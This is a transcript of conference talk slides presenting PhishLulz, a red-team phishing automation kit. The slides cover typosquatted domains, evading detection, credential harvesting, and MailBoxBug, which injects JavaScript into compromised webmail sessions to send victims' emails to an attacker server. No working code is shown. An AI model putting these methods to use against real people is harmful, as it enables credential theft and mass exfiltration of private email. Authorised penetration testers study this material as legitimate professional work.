practical phishing automation with phishlulz - kiwicon x
TRANSCRIPT
Practical Phishing Automationwith PhishLulz
antisnatchor
Outline
● Why Phishing?
● Phishing in real-life
● PhishLulz to the rescue
● FindResources.rb
● MailBoxBug.rb
● Outro
whoami● Pentesting, Vuln Research,
Coding
● BeEF core dev team
● Browser Hacker’s Handbookco-author (read it while it’s hot!)
● Senior Security ConsultantFortConsult (NCC)
Why Phishing?
Why Phishing?
● To exploit the ignorance of the masses– Or the ignorance of specific persons yous want to target
● A few good pretexts, a bunch of typoed domains anda couple of pre-planned campaign scenarios can takeyour very far with most targets
● One victim being tricked into executing yourpayloads is (usually) enough to start pivoting & userimpersonation activities
● Client-side 0days are quite expensive
Why Phishing?
● Too fun owning people in 2016 STILL with:– (Open) Office Macros
– .exe/.pkg files disguised as something else
– Browser extensions
– Other tricks (HTAs, Windows Screen Saver files, …)
● Active Directory is the “new” Java:– STEAL ONCE, AUTH EVERYWHERE
● 2FA is still mostly a myth– IF used, it relies mostly on SMSs which is fucked (see
mobile phone or SS7 exploits)
Why Phishing?
● How many companies are able to spot phishingcampaigns?– If spotted, do they know how to react, check who was
pwned or what info was leaked out?
– If the malicious email and domain are identified, afterhow many hours connectivity to the domain will beblocked?
– If you phish with a fake CV pretext just 1 target in HRdeptm. what is the likelihood it will be detected?
Phishing in real-life
● Most of the times it is easy, but sometimes dependingon the target security maturity level it could bestressful
● Even more powerful when combined with redteaming– Physically walking inside a company placing Rasberries
which phone home via LTE● so you have both wired/wifi available and you don’t need to
care about egress filters● Feed Rasberry’s scripts with credentials harvested via phishing
(ARP Spoofing and LLMNR Spoofing needed only if collectedcreds don’t take you too far)
Phishing in real-life
● Phishing, like red teaming, is opportunistic
● You want to target first target’s departments whichare in theory easier to pwn (HR, Finance, Marketing)– Perform as much OSINT & active fingerprinting as
possible
● You don’t want to directly target security-savvypeople who could raise alarm bells– Arrive to them via other channels, i.e. via user
impersonation of a trusted victim’s contact
– Do not engage at the first contact (i.e. do not addmalicious attachments to the first email, build trust first)
Phishing in real-life
Phishing in real-life
Phishing in real-life
Target: www.lulz.wa.gov.au (GMT+8)
● Discovered during reconnaissance:– Webmail.lulz.wa.gov.au: Outlook WebAccess
– Vpn1.lulz.wa.gov.au: Checkpoint SSL VPN
● OWA 2011 template
● Registered lulz-wa-gov-au.com(note: dashes instead of dots)
Phishing in real-life
Phishing in real-life
Phishing in real-life
PhishLulz to the rescue
● When doing Phishing:– Every time it’s a different story
– Configuration overhead sometimes is a killer
– You can identify repeatable patterns
– Good timings are key
– You need as much automation as possible
– Speed is key once you got access to victim’s assets
PhishLulz to the rescue
● Ideally you would like to automate:– Domain registration & DNS zone file config (SPF/DKIM)
– SMTP server configuration
– VirtualHost-like (including SSL) config
– Correlate unique clicks with email, geolocation and all thefingerprinting by BeEF
– Database of phishing templates, re-usable and effective
● With PhishLulz 95% of the above is automated
PhishLulz to the rescue
● Amazon EC2 image pre-configured with:– PhishingFrenzy – phishing framework in Rails
– BeEF – no intro needed ;-)
● Set of Ruby||GTFO scripts to make your life easierwhen doing Phishing
PhishLulz to the rescue
● Video demo…
PhishLulz to the rescue
● PhishLulz comes with a bunch of other tools– Subdomain enumeration and fingerprinting
– Extract HTML content from .eml file
– Automatically verify webmail login and extrude emailsmatching patterns
find_resources.rb – multi-threadedsubdomain discovery
● Your targets has 5 different FQDNs & you need todiscover interesting subdomains to phish
● For each FQDN, iterate through a list of 2000 subdomains checkingif they resolve, for instance:
– Webmail.target1.com
– Citrix.target2.com
– Vpn.target1.com
find_resources.rb
● Multi-threaded, so you can scan multiple domains atonce.
● If subdomain resolves, it tries to connect to ports80/443 and gets page title/Server header
● Outputs a .csv file with discovered stuff
MailBoxBug.rb
● When doing webmail credential harvesting, you usuallyend up with tens of valid credentials in a matter ofminutes
● You need to be quick searching for low hanging fruits in each mailbox of your victims – Good luck doing that manually with 50 credentials
– What if after 2 hours the target realize the phish forcing apassword change on all those 50 users that clicked?
● Remember: SPEED IS KEY
MailBoxBug.rb
● Automated & multi-threaded webmail data extrusion
● Agnostic to webmail type, doesn’t rely on APIs
● Written for automatic search&extrude of data from webmails(follow up of credential harvesting campaigns)
● Afaik there is no public tool for this– Enabling POP/IMAP → fetchmail is noisy and sometimes not
supported (see Outlook Live)
– Relying on webmail RESTful APIs (if any) → usually requires SSO
– I needed something I could easily enhance adding more webmailssupport, without re-inventing the wheel for each webmail type
MailBoxBug.rb
● Tested various approaches to support outlook.live.com– Burp traffic analysis, re-implementing the raw request flow and
managing cookies with plain Ruby net/http/nokogiri● Was working great but post-login you need JavaScript → NO GO
– Phantom/CasperJS to have JS support and instrument an headlessbrowser
● Automated login worked, but post-login what? Clicking on elementswithout ID/Names is painful, XPATH is fucked up → NO GO
MailBoxBug.rb
● Watir (a WebDriver Ruby wrapper) & JS injection– Uses Watir to instrument a browser (Firefox/Chrome)
– If login is successful, injects JavaScript code that re-implements via XMLHttpRequest the flow needed to searchand retrieve emails matching patterns
● Why JavaScript injection?– Easy to analyze webmail search/retrieve functionality
(especially if returns JSON) with Burp then re-implement
– You don’t need to manually take care of cookies/auth
– The whole approach becomes webmail agnostic as soon asyou implement the right XHR calls
MailBoxBug.rb● Data extrusion exploits the Same Origin Policy
– The JS injected code extrudes emails/attachments via cross-origin POST XHR to an https handler (Mixed Content…)
– As discussed in the Browser Hacker’s Handbook, the SOPDOES NOT prevent you to send requests cross-origin
● We don’t care about reading responses, like in XSRF scenarios
MailBoxBug.rb
● Currently supports only outlook.live.com– Common scenario if the customer uses Microsoft stuff
without hosting OWA internally
● Need Gmail or custom webmail support?– Just analyze traffic with Burp and re-implement with XHR
– Quickly test it via Firebug or JS Console
– Once it’s tested and stable, plug it in MailBoxBug
● Video demo…
Outro● PhishLulz, MailBoxBug and other tools are now
public on Github have fun :-)
https://github.com/antisnatchor/phishlulz
Hope youenjoyed!